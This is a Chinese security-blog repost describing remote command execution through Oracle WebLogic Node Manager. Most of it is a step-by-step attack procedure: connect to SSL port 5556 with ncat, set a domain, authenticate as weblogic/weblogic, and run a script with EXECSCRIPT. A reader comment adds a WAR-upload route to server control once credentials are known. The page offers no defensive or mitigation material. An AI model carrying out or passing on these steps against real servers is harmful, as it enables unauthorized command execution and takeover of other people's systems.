weblogic node manager 远程命令执行漏洞

admin 2021年4月3日19:36:32评论54 views字数 576阅读1分55秒阅读模式

By:cnbird

1.找到5556的SSL端口

ncat --ssl ip 5556

输出HELLO

+OK Node manager v10.3 started

2.设置domain

DOMAIN my_domain ipc$

+OK Current domain set to 'my_domain'

3.注意这里是上面自己设置的weblogic的密码,不是服务器默认的

USER weblogic

PASS weblogic

4.执行命令

EXECSCRIPT 1.sh

参考资料:

http://book.51cto.com/art/201110/295927.htm

http://guanting.com/security/bug/information/3343.html

这个在指定WebLogic域名之后,Node Manager要求使用USER和PASS进行验证吧。如果有账号密码,直接7001登录,再上war,一样可以拿到权限的哦。

文章来源于lcx.cc:weblogic node manager 远程命令执行漏洞

相关推荐: 浅谈互联网中弱口令的危害

0x00 什么是弱口令 弱口令(weak password) 没有严格和准确的定义,通常认为容易被别人(他们有可能对你很了解)猜测到或被破解工具破解的口令均为弱口令。 弱口令指的是仅包含简单数字和字母的口令,例如“123”、“abc”等,因为这样的口令很容易被…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:36:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   weblogic node manager 远程命令执行漏洞http://cn-sec.com/archives/323862.html

发表评论

匿名网友 填写信息